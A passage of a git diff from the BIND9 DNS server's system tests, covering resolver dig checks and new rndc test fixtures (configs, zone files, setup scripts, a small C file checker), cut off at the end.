+dig_with_opts soa delegation-only @10.53.0.5 > dig.out.ns5.test${n} || ret=1 +grep "status: NOERROR" dig.out.ns5.test${n} > /dev/null || ret=1 +grep "ANSWER: 1," dig.out.ns5.test${n} > /dev/null || ret=1 +if [ $ret != 0 ]; then echo_i "failed"; fi +status=$((status + ret)) +n=$((n+1)) + +n=$((n+1)) +echo_i "check that NS query returns data for delegation-only apex (${n})" +ret=0 +dig_with_opts ns delegation-only @10.53.0.5 > dig.out.ns5.test${n} || ret=1 +grep "status: NOERROR" dig.out.ns5.test${n} > /dev/null || ret=1 +grep "ANSWER: 1," dig.out.ns5.test${n} > /dev/null || ret=1 +if [ $ret != 0 ]; then echo_i "failed"; fi +status=$((status + ret)) + +n=$((n+1)) +echo_i "check that A query returns data for delegation-only A apex (${n})" +ret=0 +dig_with_opts a delegation-only @10.53.0.5 > dig.out.ns5.test${n} || ret=1 +grep "status: NOERROR" dig.out.ns5.test${n} > /dev/null || ret=1 +grep "ANSWER: 1," dig.out.ns5.test${n} > /dev/null || ret=1 +if [ $ret != 0 ]; then echo_i "failed"; fi +status=$((status + ret)) + +n=$((n+1)) +echo_i "check that CDS query returns data for delegation-only apex (${n})" +ret=0 +dig_with_opts cds delegation-only @10.53.0.5 > dig.out.ns5.test${n} || ret=1 +grep "status: NOERROR" dig.out.ns5.test${n} > /dev/null || ret=1 +grep "ANSWER: 1," dig.out.ns5.test${n} > /dev/null || ret=1 +if [ $ret != 0 ]; then echo_i "failed"; fi +status=$((status + ret)) + +n=$((n+1)) +echo_i "check that AAAA query returns data for delegation-only AAAA apex (${n})" +ret=0 +dig_with_opts a delegation-only @10.53.0.5 > dig.out.ns5.test${n} || ret=1 +grep "status: NOERROR" dig.out.ns5.test${n} > /dev/null || ret=1 +grep "ANSWER: 1," dig.out.ns5.test${n} > /dev/null || ret=1 +if [ $ret != 0 ]; then echo_i "failed"; fi +status=$((status + ret)) +n=$((n+1)) + +echo_i "check that DNSKEY query returns data for delegation-only apex (${n})" +ret=0 +dig_with_opts dnskey delegation-only @10.53.0.5 > dig.out.ns5.test${n} || ret=1 +grep "status: NOERROR" dig.out.ns5.test${n} > /dev/null || ret=1 +grep "ANSWER: 1," dig.out.ns5.test${n} > /dev/null || ret=1 +if [ $ret != 0 ]; then echo_i "failed"; fi +status=$((status + ret)) + +n=$((n+1)) +echo_i "check that CDNSKEY query returns data for delegation-only apex (${n})" +ret=0 +dig_with_opts cdnskey delegation-only @10.53.0.5 > dig.out.ns5.test${n} || ret=1 +grep "status: NOERROR" dig.out.ns5.test${n} > /dev/null || ret=1 +grep "ANSWER: 1," dig.out.ns5.test${n} > /dev/null || ret=1 +if [ $ret != 0 ]; then echo_i "failed"; fi +status=$((status + ret)) + +n=$((n+1)) +echo_i "check that NXDOMAIN is returned for delegation-only non-apex A data (${n})" +ret=0 +dig_with_opts a a.delegation-only @10.53.0.5 > dig.out.ns5.test${n} || ret=1 +grep "status: NXDOMAIN" dig.out.ns5.test${n} > /dev/null || ret=1 +if [ $ret != 0 ]; then echo_i "failed"; fi +status=$((status + ret)) + +n=$((n+1)) +echo_i "check that NXDOMAIN is returned for delegation-only non-apex CDS data (${n})" +ret=0 +dig_with_opts cds cds.delegation-only @10.53.0.5 > dig.out.ns5.test${n} || ret=1 +grep "status: NXDOMAIN" dig.out.ns5.test${n} > /dev/null || ret=1 +if [ $ret != 0 ]; then echo_i "failed"; fi +status=$((status + ret)) + +n=$((n+1)) +echo_i "check that NXDOMAIN is returned for delegation-only non-apex AAAA data (${n})" +ret=0 +dig_with_opts aaaa aaaa.delegation-only @10.53.0.5 > dig.out.ns5.test${n} || ret=1 +grep "status: NXDOMAIN" dig.out.ns5.test${n} > /dev/null || ret=1 +if [ $ret != 0 ]; then echo_i "failed"; fi +status=$((status + ret)) +n=$((n+1)) + +echo_i "check that NXDOMAIN is returned for delegation-only non-apex CDNSKEY data (${n})" +ret=0 +dig_with_opts cdnskey cdnskey.delegation-only @10.53.0.5 > dig.out.ns5.test${n} || ret=1 +grep "status: NXDOMAIN" dig.out.ns5.test${n} > /dev/null || ret=1 +if [ $ret != 0 ]; then echo_i "failed"; fi +status=$((status + ret)) + +n=$((n+1)) +echo_i "check zero ttl not returned for learnt non zero ttl records (${n})" +ret=0 +# use prefetch disabled server +dig_with_opts @10.53.0.7 non-zero.example.net txt > dig.out.1.${n} || ret=1 +ttl1=$(awk '/"A" "short" "ttl"/ { print $2 - 2 }' dig.out.1.${n}) +# sleep so we are in expire range +sleep "${ttl1:-0}" +# look for ttl = 1, allow for one miss at getting zero ttl +zerotonine="0 1 2 3 4 5 6 7 8 9" +zerotonine="$zerotonine $zerotonine $zerotonine" +for i in $zerotonine $zerotonine $zerotonine $zerotonine +do + dig_with_opts @10.53.0.7 non-zero.example.net txt > dig.out.2.${n} || ret=1 + ttl2=$(awk '/"A" "short" "ttl"/ { print $2 }' dig.out.2.${n}) + test "${ttl2:-1}" -eq 0 && break + test "${ttl2:-1}" -ge "${ttl1:-0}" && break + "${PERL}" -e 'select(undef, undef, undef, 0.05);' +done +test "${ttl2:-1}" -eq 0 && ret=1 +test "${ttl2:-1}" -ge "${ttl1:-0}" || ret=1 +if [ $ret != 0 ]; then echo_i "failed"; fi +status=$((status + ret)) + +n=$((n+1)) +echo_i "check zero ttl is returned for learnt zero ttl records (${n})" +ret=0 +dig_with_opts @10.53.0.7 zero.example.net txt > dig.out.1.${n} || ret=1 +ttl=$(awk '/"A" "zero" "ttl"/ { print $2 }' dig.out.1.${n}) +test "${ttl:-1}" -eq 0 || ret=1 +if [ $ret != 0 ]; then echo_i "failed"; fi +status=$((status + ret)) + +n=$((n+1)) +echo_i "check that 'ad' in not returned in truncated answer with empty answer and authority sections to request with +ad (${n})" +ret=0 +dig_with_opts @10.53.0.6 dnskey ds.example.net +bufsize=512 +ad +nodnssec +ignore +norec > dig.out.$n +grep "flags: qr aa tc; QUERY: 1, ANSWER: 0, AUTHORITY: 0" dig.out.$n > /dev/null || ret=1 +if [ $ret != 0 ]; then echo_i "failed"; fi +status=$((status + ret)) + +n=$((n+1)) +echo_i "check that 'ad' in not returned in truncated answer with empty answer and authority sections to request with +dnssec (${n})" +ret=0 +dig_with_opts @10.53.0.6 dnskey ds.example.net +bufsize=512 +noad +dnssec +ignore +norec > dig.out.$n +grep "flags: qr aa tc; QUERY: 1, ANSWER: 0, AUTHORITY: 0" dig.out.$n > /dev/null || ret=1 +if [ $ret != 0 ]; then echo_i "failed"; fi +status=$((status + ret)) + +n=$((n+1)) +echo_i "check that the resolver accepts a reply with empty question section with TC=1 and retries over TCP ($n)" +ret=0 +dig_with_opts @10.53.0.5 truncated.no-questions. a +tries=3 +time=5 > dig.ns5.out.${n} || ret=1 +grep "status: NOERROR" dig.ns5.out.${n} > /dev/null || ret=1 +grep "ANSWER: 1," dig.ns5.out.${n} > /dev/null || ret=1 +grep "1\.2\.3\.4" dig.ns5.out.${n} > /dev/null || ret=1 +if [ $ret != 0 ]; then echo_i "failed"; fi +status=$((status + ret)) + +n=$((n+1)) +echo_i "check that the resolver rejects a reply with empty question section with TC=0 ($n)" +ret=0 +dig_with_opts @10.53.0.5 not-truncated.no-questions. a +tries=3 +time=5 > dig.ns5.out.${n} || ret=1 +grep "status: NOERROR" dig.ns5.out.${n} > /dev/null && ret=1 +grep "ANSWER: 1," dig.ns5.out.${n} > /dev/null && ret=1 +grep "1\.2\.3\.4" dig.ns5.out.${n} > /dev/null && ret=1 +if [ $ret != 0 ]; then echo_i "failed"; fi +status=$((status + ret)) + +n=$((n+1)) +echo_i "checking SERVFAIL is returned when all authoritative servers return FORMERR ($n)" +ret=0 +dig_with_opts @10.53.0.5 ns.formerr-to-all. a > dig.ns5.out.${n} || ret=1 +grep "status: SERVFAIL" dig.ns5.out.${n} > /dev/null || ret=1 +if [ $ret != 0 ]; then echo_i "failed"; fi +status=$((status + ret)) + +n=$((n+1)) +echo_i "check logged command line ($n)" +ret=0 +grep "running as: .* -m record,size,mctx " ns1/named.run > /dev/null || ret=1 +if [ $ret != 0 ]; then echo_i "failed"; fi +status=$((status + ret)) + +n=$((n+1)) +echo_i "checking NXDOMAIN is returned when querying non existing domain in CH class ($n)" +ret=0 +dig_with_opts @10.53.0.1 id.hostname txt ch > dig.ns1.out.${n} || ret=1 +grep "status: NXDOMAIN" dig.ns1.out.${n} > /dev/null || ret=1 +if [ $ret != 0 ]; then echo_i "failed"; fi +status=$((status + ret)) + +n=$((n+1)) +echo_i "check handling of large referrals to unresponsive name servers ($n)" +ret=0 +dig_with_opts +timeout=15 large-referral.example.net @10.53.0.1 a > dig.out.ns1.test${n} || ret=1 +grep "status: SERVFAIL" dig.out.ns1.test${n} > /dev/null || ret=1 +# Check the total number of findname() calls triggered by a single query +# for large-referral.example.net/A. +findname_call_count="$(grep -c "large-referral\.example\.net.*FINDNAME" ns1/named.run)" +if [ "${findname_call_count}" -gt 1000 ]; then + echo_i "failed: ${findname_call_count} (> 1000) findname() calls detected for large-referral.example.net" + ret=1 +fi +# Check whether the limit of NS RRs processed for any delegation +# encountered was not exceeded. +if grep -Eq "dns_adb_createfind: started (A|AAAA) fetch for name ns21.fake.redirect.com" ns1/named.run; then + echo_i "failed: unexpected address fetch(es) were triggered for ns21.fake.redirect.com" + ret=1 +fi +if [ $ret != 0 ]; then echo_i "failed"; fi +status=$((status + ret)) + +n=$((n+1)) +echo_i "checking query resolution for a domain with a valid glueless delegation chain ($n)" +ret=0 +rndccmd 10.53.0.1 flush || ret=1 +dig_with_opts foo.bar.sub.tld1 @10.53.0.1 TXT > dig.out.ns1.test${n} || ret=1 +grep "status: NOERROR" dig.out.ns1.test${n} > /dev/null || ret=1 +grep "IN.*TXT.*baz" dig.out.ns1.test${n} > /dev/null || ret=1 +if [ $ret != 0 ]; then echo_i "failed"; fi +status=$((status + ret)) + +n=$((n+1)) +echo_i "check that correct namespace is chosen for dual-stack-servers ($n)" +ret=0 +# +# The two priming queries are needed until we fix dual-stack-servers fully +# +dig_with_opts @fd92:7065:b8e:ffff::9 v4.nameserver A > dig.out.prime1.${n} || ret=1 +dig_with_opts @fd92:7065:b8e:ffff::9 v4.nameserver AAAA > dig.out.prime2.${n} || ret=1 +dig_with_opts @fd92:7065:b8e:ffff::9 foo.v4only.net A > dig.out.ns9.${n} || ret=1 +grep "status: NOERROR" dig.out.ns9.${n} > /dev/null || ret=1 +if [ $ret != 0 ]; then echo_i "failed"; fi +status=$((status + ret)) + +n=$((n+1)) +echo_i "check expired TTLs with qtype * (${n})" +ret=0 +dig_with_opts +tcp @10.53.0.5 mixedttl.tld any > dig.out.1.${n} || ret=1 +ttl1=$(awk '$1 == "mixedttl.tld." && $4 == "A" { print $2 + 1 }' dig.out.1.${n}) +# sleep TTL + 1 so that record has expired +sleep "${ttl1:-0}" +dig_with_opts +tcp @10.53.0.5 mixedttl.tld any > dig.out.2.${n} || ret=1 +# check preconditions +grep "ANSWER: 3," dig.out.1.${n} > /dev/null || ret=1 +lines=$(awk '$1 == "mixedttl.tld." && $2 > 30 { print }' dig.out.1.${n} | wc -l) +test ${lines:-1} -ne 0 && ret=1 +# check behaviour (there may be 1 answer on very slow machines) +grep "ANSWER: [12]," dig.out.2.${n} > /dev/null || ret=1 +lines=$(awk '$1 == "mixedttl.tld." && $2 > 30 { print }' dig.out.2.${n} | wc -l) +test ${lines:-1} -ne 0 && ret=1 +if [ $ret != 0 ]; then echo_i "failed"; fi +status=$((status + ret)) + +echo_i "exit status: $status" +[ $status -eq 0 ] || exit 1 diff --git a/bin/tests/system/rndc/Makefile.in b/bin/tests/system/rndc/Makefile.in new file mode 100644 index 0000000..a17c5df --- /dev/null +++ b/bin/tests/system/rndc/Makefile.in @@ -0,0 +1,48 @@ +# Copyright (C) Internet Systems Consortium, Inc. ("ISC") +# +# SPDX-License-Identifier: MPL-2.0 +# +# This Source Code Form is subject to the terms of the Mozilla Public +# License, v. 2.0. If a copy of the MPL was not distributed with this +# file, you can obtain one at https://mozilla.org/MPL/2.0/. +# +# See the COPYRIGHT file distributed with this work for additional +# information regarding copyright ownership. + +srcdir = @srcdir@ +VPATH = @srcdir@ +top_srcdir = @top_srcdir@ + +VERSION=@BIND9_VERSION@ + +@BIND9_MAKE_INCLUDES@ + +CINCLUDES = ${ISC_INCLUDES} + +CDEFINES = +CWARNINGS = + +ISCLIBS = ../../../../lib/isc/libisc.@A@ @NO_LIBTOOL_ISCLIBS@ + +DNSDEPLIBS = +ISCDEPLIBS = ../../../../lib/isc/libisc.@A@ + +DEPLIBS = + +LIBS = @LIBS@ + +TARGETS = gencheck@EXEEXT@ + +GENCHECKOBJS = gencheck.@O@ + +SRCS = gencheck.c + +@BIND9_MAKE_RULES@ + +all: gencheck@EXEEXT@ + +gencheck@EXEEXT@: ${GENCHECKOBJS} ${ISCDEPLIBS} + ${LIBTOOL_MODE_LINK} ${PURIFY} ${CC} ${CFLAGS} ${LDFLAGS} -o $@ ${GENCHECKOBJS} ${ISCLIBS} ${LIBS} + +clean distclean:: + rm -f ${TARGETS} diff --git a/bin/tests/system/rndc/clean.sh b/bin/tests/system/rndc/clean.sh new file mode 100644 index 0000000..d18b5a5 --- /dev/null +++ b/bin/tests/system/rndc/clean.sh @@ -0,0 +1,33 @@ +#!/bin/sh + +# Copyright (C) Internet Systems Consortium, Inc. ("ISC") +# +# SPDX-License-Identifier: MPL-2.0 +# +# This Source Code Form is subject to the terms of the Mozilla Public +# License, v. 2.0. If a copy of the MPL was not distributed with this +# file, you can obtain one at https://mozilla.org/MPL/2.0/. +# +# See the COPYRIGHT file distributed with this work for additional +# information regarding copyright ownership. + +rm -f dig.out.*.test* +rm -f ns*/named.lock +rm -f ns*/named.memstats +rm -f ns*/named.run ns*/named.run.prev +rm -f ns2/named.stats +rm -f ns2/nil.db ns2/other.db ns2/static.db ns2/*.jnl +rm -f ns2/session.key +rm -f ns3/named_dump.db* +rm -f ns4/*.nta +rm -f ns4/example.db ns4/example.db.jnl +rm -f ns4/key?.conf +rm -f ns6/huge.zone.db +rm -f ns7/include.db ns7/test.db ns7/*.jnl +rm -f ns7/named_dump.db* +rm -f ns*/named.conf +rm -f nsupdate.out.*.test* +rm -f python.out.*.test* +rm -f rndc.out.*.test* +rm -f ns*/managed-keys.bind* ns*/*.mkeys* +rm -f ns*/*.nta diff --git a/bin/tests/system/rndc/gencheck.c b/bin/tests/system/rndc/gencheck.c new file mode 100644 index 0000000..c0bd718 --- /dev/null +++ b/bin/tests/system/rndc/gencheck.c @@ -0,0 +1,90 @@ +/* + * Copyright (C) Internet Systems Consortium, Inc. ("ISC") + * + * SPDX-License-Identifier: MPL-2.0 + * + * This Source Code Form is subject to the terms of the Mozilla Public + * License, v. 2.0. If a copy of the MPL was not distributed with this + * file, you can obtain one at https://mozilla.org/MPL/2.0/. + * + * See the COPYRIGHT file distributed with this work for additional + * information regarding copyright ownership. + */ + +#include <fcntl.h> +#include <stdio.h> +#include <stdlib.h> +#include <string.h> +#include <sys/stat.h> +#include <unistd.h> + +#include <isc/print.h> + +#define USAGE "usage: gencheck <filename>\n" + +static int +check(const char *buf, ssize_t count, size_t *start) { + const char chars[] = "abcdefghijklmnopqrstuvwxyz0123456789"; + ssize_t i; + + for (i = 0; i < count; i++, *start = (*start + 1) % (sizeof(chars) - 1)) + { + /* Just ignore the trailing newline */ + if (buf[i] == '\n') { + continue; + } + if (buf[i] != chars[*start]) { + return (0); + } + } + + return (1); +} + +int +main(int argc, char **argv) { + int ret; + int fd; + ssize_t count; + char buf[1024]; + size_t start; + size_t length; + + ret = EXIT_FAILURE; + fd = -1; + length = 0; + + if (argc != 2) { + fputs(USAGE, stderr); + goto out; + } + + fd = open(argv[1], O_RDONLY); + if (fd == -1) { + goto out; + } + + start = 0; + while ((count = read(fd, buf, sizeof(buf))) != 0) { + if (count < 0) { + goto out; + } + + if (!check(buf, count, &start)) { + goto out; + } + + length += count; + } + + ret = EXIT_SUCCESS; + +out: + printf("%lu\n", (unsigned long)length); + + if (fd != -1) { + close(fd); + } + + return (ret); +} diff --git a/bin/tests/system/rndc/ns2/incl.db b/bin/tests/system/rndc/ns2/incl.db new file mode 100644 index 0000000..bb8b343 --- /dev/null +++ b/bin/tests/system/rndc/ns2/incl.db @@ -0,0 +1,13 @@ +; Copyright (C) Internet Systems Consortium, Inc. ("ISC") +; +; SPDX-License-Identifier: MPL-2.0 +; +; This Source Code Form is subject to the terms of the Mozilla Public +; License, v. 2.0. If a copy of the MPL was not distributed with this +; file, you can obtain one at https://mozilla.org/MPL/2.0/. +; +; See the COPYRIGHT file distributed with this work for additional +; information regarding copyright ownership. + +; Used for testing $INCLUDE +$INCLUDE "static.db" diff --git a/bin/tests/system/rndc/ns2/named.conf.in b/bin/tests/system/rndc/ns2/named.conf.in new file mode 100644 index 0000000..1af5346 --- /dev/null +++ b/bin/tests/system/rndc/ns2/named.conf.in @@ -0,0 +1,64 @@ +/* + * Copyright (C) Internet Systems Consortium, Inc. ("ISC") + * + * SPDX-License-Identifier: MPL-2.0 + * + * This Source Code Form is subject to the terms of the Mozilla Public + * License, v. 2.0. If a copy of the MPL was not distributed with this + * file, you can obtain one at https://mozilla.org/MPL/2.0/. + * + * See the COPYRIGHT file distributed with this work for additional + * information regarding copyright ownership. + */ + +options { + port @PORT@; + pid-file "named.pid"; + session-keyfile "session.key"; + listen-on { 10.53.0.2; }; + listen-on-v6 { none; }; + recursion no; +}; + +key rndc_key { + secret "1234abcd8765"; + algorithm hmac-sha256; +}; + +key secondkey { + secret "abcd1234abcd8765"; + algorithm hmac-sha256; +}; + +controls { + inet 10.53.0.2 port @CONTROLPORT@ allow { any; } keys { rndc_key; secondkey; }; +}; + + +zone "." { + type hint; + file "../../common/root.hint"; +}; + +zone "nil" { + type primary; + update-policy local; + file "nil.db"; + ixfr-from-differences yes; +}; + +zone "other" { + type primary; + update-policy local; + file "other.db"; +}; + +zone "static" { + type primary; + file "static.db"; +}; + +zone "incl" { + type primary; + file "incl.db"; +}; diff --git a/bin/tests/system/rndc/ns2/secondkey.conf b/bin/tests/system/rndc/ns2/secondkey.conf new file mode 100644 index 0000000..1b6af7b --- /dev/null +++ b/bin/tests/system/rndc/ns2/secondkey.conf @@ -0,0 +1,21 @@ +/* + * Copyright (C) Internet Systems Consortium, Inc. ("ISC") + * + * SPDX-License-Identifier: MPL-2.0 + * + * This Source Code Form is subject to the terms of the Mozilla Public + * License, v. 2.0. If a copy of the MPL was not distributed with this + * file, you can obtain one at https://mozilla.org/MPL/2.0/. + * + * See the COPYRIGHT file distributed with this work for additional + * information regarding copyright ownership. + */ + +options { + default-key "secondkey"; +}; + +key secondkey { + secret "abcd1234abcd8765"; + algorithm hmac-sha256; +}; diff --git a/bin/tests/system/rndc/ns3/named.conf.in b/bin/tests/system/rndc/ns3/named.conf.in new file mode 100644 index 0000000..378ab67 --- /dev/null +++ b/bin/tests/system/rndc/ns3/named.conf.in @@ -0,0 +1,48 @@ +/* + * Copyright (C) Internet Systems Consortium, Inc. ("ISC") + * + * SPDX-License-Identifier: MPL-2.0 + * + * This Source Code Form is subject to the terms of the Mozilla Public + * License, v. 2.0. If a copy of the MPL was not distributed with this + * file, you can obtain one at https://mozilla.org/MPL/2.0/. + * + * See the COPYRIGHT file distributed with this work for additional + * information regarding copyright ownership. + */ + +options { + port @PORT@; + pid-file "named.pid"; + listen-on { 10.53.0.3; }; + listen-on-v6 { none; }; +}; + +key rndc_key { + secret "1234abcd8765"; + algorithm hmac-sha256; +}; + +key secondkey { + secret "abcd1234abcd8765"; + algorithm hmac-sha256; +}; + +controls { + inet 10.53.0.3 port @CONTROLPORT@ allow { any; } keys { rndc_key; }; +}; + +view all { + match-clients { any; }; + + recursion no; + + zone "." { + type hint; + file "../../common/root.hint"; + }; +}; + +view none { + match-clients { none; }; +}; diff --git a/bin/tests/system/rndc/ns4/named.conf.in b/bin/tests/system/rndc/ns4/named.conf.in new file mode 100644 index 0000000..6dc37ec --- /dev/null +++ b/bin/tests/system/rndc/ns4/named.conf.in @@ -0,0 +1,38 @@ +/* + * Copyright (C) Internet Systems Consortium, Inc. ("ISC") + * + * SPDX-License-Identifier: MPL-2.0 + * + * This Source Code Form is subject to the terms of the Mozilla Public + * License, v. 2.0. If a copy of the MPL was not distributed with this + * file, you can obtain one at https://mozilla.org/MPL/2.0/. + * + * See the COPYRIGHT file distributed with this work for additional + * information regarding copyright ownership. + */ + +options { + port @PORT@; + pid-file "named.pid"; + listen-on { 10.53.0.4; }; + listen-on-v6 { none; }; + recursion yes; + dnssec-validation yes; +}; + +view normal { + match-clients { any; }; + + zone example { + type primary; + file "example.db"; + allow-update { any; }; + }; +}; + +view "view with a space" { + match-clients { none; }; + zone example { + in-view normal; + }; +}; diff --git a/bin/tests/system/rndc/ns5/named.conf.in b/bin/tests/system/rndc/ns5/named.conf.in new file mode 100644 index 0000000..ef38b17 --- /dev/null +++ b/bin/tests/system/rndc/ns5/named.conf.in @@ -0,0 +1,34 @@ +/* + * Copyright (C) Internet Systems Consortium, Inc. ("ISC") + * + * SPDX-License-Identifier: MPL-2.0 + * + * This Source Code Form is subject to the terms of the Mozilla Public + * License, v. 2.0. If a copy of the MPL was not distributed with this + * file, you can obtain one at https://mozilla.org/MPL/2.0/. + * + * See the COPYRIGHT file distributed with this work for additional + * information regarding copyright ownership. + */ + +options { + port @PORT@; + pid-file "named.pid"; + listen-on { 10.53.0.5; }; + listen-on-v6 { none; }; + recursion no; +}; + +key rndc_key { + secret "1234abcd8765"; + algorithm hmac-sha256; +}; + +controls { + inet 10.53.0.5 port @CONTROLPORT@ allow { any; } keys { rndc_key; } read-only yes; +}; + +zone "." { + type hint; + file "../../common/root.hint"; +}; diff --git a/bin/tests/system/rndc/ns6/named.args b/bin/tests/system/rndc/ns6/named.args new file mode 100644 index 0000000..9d7d03a --- /dev/null +++ b/bin/tests/system/rndc/ns6/named.args @@ -0,0 +1,3 @@ +# teardown of a huge zone with tracing enabled takes way too long +# -m none is set so that stop.pl does not timeout +-D rndc-ns6 -X named.lock -m none -c named.conf -d 99 -g -U 4 -T maxcachesize=2097152 diff --git a/bin/tests/system/rndc/ns6/named.conf.in b/bin/tests/system/rndc/ns6/named.conf.in new file mode 100644 index 0000000..5c35741 --- /dev/null +++ b/bin/tests/system/rndc/ns6/named.conf.in @@ -0,0 +1,29 @@ +/* + * Copyright (C) Internet Systems Consortium, Inc. ("ISC") + * + * SPDX-License-Identifier: MPL-2.0 + * + * This Source Code Form is subject to the terms of the Mozilla Public + * License, v. 2.0. If a copy of the MPL was not distributed with this + * file, you can obtain one at https://mozilla.org/MPL/2.0/. + * + * See the COPYRIGHT file distributed with this work for additional + * information regarding copyright ownership. + */ + +options { + port @PORT@; + pid-file "named.pid"; + listen-on { 10.53.0.6; }; + listen-on-v6 { none; }; + recursion no; +}; + +key rndc_key { + secret "1234abcd8765"; + algorithm hmac-sha256; +}; + +controls { + inet 10.53.0.6 port @CONTROLPORT@ allow { any; } keys { rndc_key; }; +}; diff --git a/bin/tests/system/rndc/ns7/include.db.in b/bin/tests/system/rndc/ns7/include.db.in new file mode 100644 index 0000000..011997b --- /dev/null +++ b/bin/tests/system/rndc/ns7/include.db.in @@ -0,0 +1,16 @@ +; Copyright (C) Internet Systems Consortium, Inc. ("ISC") +; +; SPDX-License-Identifier: MPL-2.0 +; +; This Source Code Form is subject to the terms of the Mozilla Public +; License, v. 2.0. If a copy of the MPL was not distributed with this +; file, you can obtain one at https://mozilla.org/MPL/2.0/. +; +; See the COPYRIGHT file distributed with this work for additional +; information regarding copyright ownership. + +@ 86400 IN SOA ns7 hostmaster 1 5 5 1814400 3600 +@ NS ns7 +ns7 A 10.53.0.7 + +text1 TXT "include 1" diff --git a/bin/tests/system/rndc/ns7/include2.db.in b/bin/tests/system/rndc/ns7/include2.db.in new file mode 100644 index 0000000..e5d1981 --- /dev/null +++ b/bin/tests/system/rndc/ns7/include2.db.in @@ -0,0 +1,16 @@ +; Copyright (C) Internet Systems Consortium, Inc. ("ISC") +; +; SPDX-License-Identifier: MPL-2.0 +; +; This Source Code Form is subject to the terms of the Mozilla Public +; License, v. 2.0. If a copy of the MPL was not distributed with this +; file, you can obtain one at https://mozilla.org/MPL/2.0/. +; +; See the COPYRIGHT file distributed with this work for additional +; information regarding copyright ownership. + +@ 86400 IN SOA ns7 hostmaster 4 5 5 1814400 3600 +@ NS ns7 +ns7 A 10.53.0.7 + +text1 TXT "include 2" diff --git a/bin/tests/system/rndc/ns7/named.conf.in b/bin/tests/system/rndc/ns7/named.conf.in new file mode 100644 index 0000000..adca731 --- /dev/null +++ b/bin/tests/system/rndc/ns7/named.conf.in @@ -0,0 +1,57 @@ +/* + * Copyright (C) Internet Systems Consortium, Inc. ("ISC") + * + * SPDX-License-Identifier: MPL-2.0 + * + * This Source Code Form is subject to the terms of the Mozilla Public + * License, v. 2.0. If a copy of the MPL was not distributed with this + * file, you can obtain one at https://mozilla.org/MPL/2.0/. + * + * See the COPYRIGHT file distributed with this work for additional + * information regarding copyright ownership. + */ + +options { + port @PORT@; + pid-file "named.pid"; + listen-on { 10.53.0.7; }; + listen-on-v6 { none; }; +}; + +key rndc_key { + secret "1234abcd8765"; + algorithm hmac-sha256; +}; + +key int { + algorithm @DEFAULT_HMAC@; + secret "FrSt77yPTFx6hTs4i2tKLB9LmE0="; +}; + +key ext { + algorithm @DEFAULT_HMAC@; + secret "FrSt77yPTFx6hTs4i2tKLB9LmE0="; +}; + +controls { + inet 10.53.0.7 port @CONTROLPORT@ allow { any; } keys { rndc_key; }; +}; + +view internal { + match-clients { key "int"; }; + + zone "test" { + type primary; + update-policy { grant int zonesub any; }; + file "test.db"; + ixfr-from-differences yes; + }; +}; + +view external { + match-clients { key "ext"; }; + + zone "test" { + in-view internal; + }; +}; diff --git a/bin/tests/system/rndc/ns7/test.db.in b/bin/tests/system/rndc/ns7/test.db.in new file mode 100644 index 0000000..0bff14e --- /dev/null +++ b/bin/tests/system/rndc/ns7/test.db.in @@ -0,0 +1,13 @@ +; Copyright (C) Internet Systems Consortium, Inc. ("ISC") +; +; SPDX-License-Identifier: MPL-2.0 +; +; This Source Code Form is subject to the terms of the Mozilla Public +; License, v. 2.0. If a copy of the MPL was not distributed with this +; file, you can obtain one at https://mozilla.org/MPL/2.0/. +; +; See the COPYRIGHT file distributed with this work for additional +; information regarding copyright ownership. + +$TTL 3600 +$INCLUDE "include.db" diff --git a/bin/tests/system/rndc/setup.sh b/bin/tests/system/rndc/setup.sh new file mode 100644 index 0000000..7292818 --- /dev/null +++ b/bin/tests/system/rndc/setup.sh @@ -0,0 +1,57 @@ +#!/bin/sh + +# Copyright (C) Internet Systems Consortium, Inc. ("ISC") +# +# SPDX-License-Identifier: MPL-2.0 +# +# This Source Code Form is subject to the terms of the Mozilla Public +# License, v. 2.0. If a copy of the MPL was not distributed with this +# file, you can obtain one at https://mozilla.org/MPL/2.0/. +# +# See the COPYRIGHT file distributed with this work for additional +# information regarding copyright ownership. + +SYSTEMTESTTOP=.. +. $SYSTEMTESTTOP/conf.sh + +$SHELL ../genzone.sh 2 >ns2/nil.db +$SHELL ../genzone.sh 2 >ns2/other.db +$SHELL ../genzone.sh 2 >ns2/static.db +$SHELL ../genzone.sh 2 >ns4/example.db + +cp ns7/test.db.in ns7/test.db +cp ns7/include.db.in ns7/include.db + +$SHELL ../genzone.sh 2 >ns6/huge.zone.db +awk 'END { for (i = 1; i <= 1000000; i++) + printf "host%d IN A 10.53.0.6\n", i; }' < /dev/null >> ns6/huge.zone.db + +copy_setports ns2/named.conf.in ns2/named.conf +copy_setports ns3/named.conf.in ns3/named.conf +copy_setports ns4/named.conf.in ns4/named.conf +copy_setports ns5/named.conf.in ns5/named.conf +copy_setports ns6/named.conf.in ns6/named.conf +copy_setports ns7/named.conf.in ns7/named.conf + +make_key () { + $RNDCCONFGEN -k key$1 -A $3 -s 10.53.0.4 -p $2 \ + > ns4/key${1}.conf 2> /dev/null + grep -E -v '(^# Start|^# End|^# Use|^[^#])' ns4/key$1.conf | cut -c3- | \ + sed 's/allow { 10.53.0.4/allow { any/' >> ns4/named.conf +} + +$FEATURETEST --md5 && make_key 1 ${EXTRAPORT1} hmac-md5 +make_key 2 ${EXTRAPORT2} hmac-sha1 +make_key 3 ${EXTRAPORT3} hmac-sha224 +make_key 4 ${EXTRAPORT4} hmac-sha256 +make_key 5 ${EXTRAPORT5} hmac-sha384 +make_key 6 ${EXTRAPORT6} hmac-sha512 + +cat >> ns4/named.conf <<- EOF + +controls { + inet 10.53.0.4 port ${EXTRAPORT7} + allow { any; } keys { "key1"; "key2"; "key3"; + "key4"; "key5"; "key6"; }; +}; +EOF diff --git a/bin/tests/system/rndc/tests.sh b/bin/tests/system/rndc/tests.sh new file mode 100644 index 0000000..4c40062 --- /dev/null +++ b/bin/tests/system/rndc/tests.sh @@ -0,0 +1,839 @@ +#!/bin/sh + +# Copyright (C) Internet Systems Consortium, Inc. ("ISC") +# +# SPDX-License-Identifier: MPL-2.0 +# +# This Source Code Form is subject to the terms of the Mozilla Public +# License, v. 2.0. If a copy of the MPL was not distributed with this +# file, you can obtain one at https://mozilla.org/MPL/2.0/. +# +# See the COPYRIGHT file distributed with this work for additional +# information regarding copyright ownership. + +SYSTEMTESTTOP=.. +. $SYSTEMTESTTOP/conf.sh + +DIGOPTS="+tcp +noadd +nosea +nostat +noquest +nocomm +nocmd" +DIGOPTS="" +DIGCMD="$DIG $DIGOPTS -p ${PORT}" +RNDCCMD="$RNDC -p ${CONTROLPORT} -c ../common/rndc.conf -s" + +status=0 +n=0 + +n=`expr $n + 1` +echo_i "preparing ($n)" +ret=0 +$NSUPDATE -p 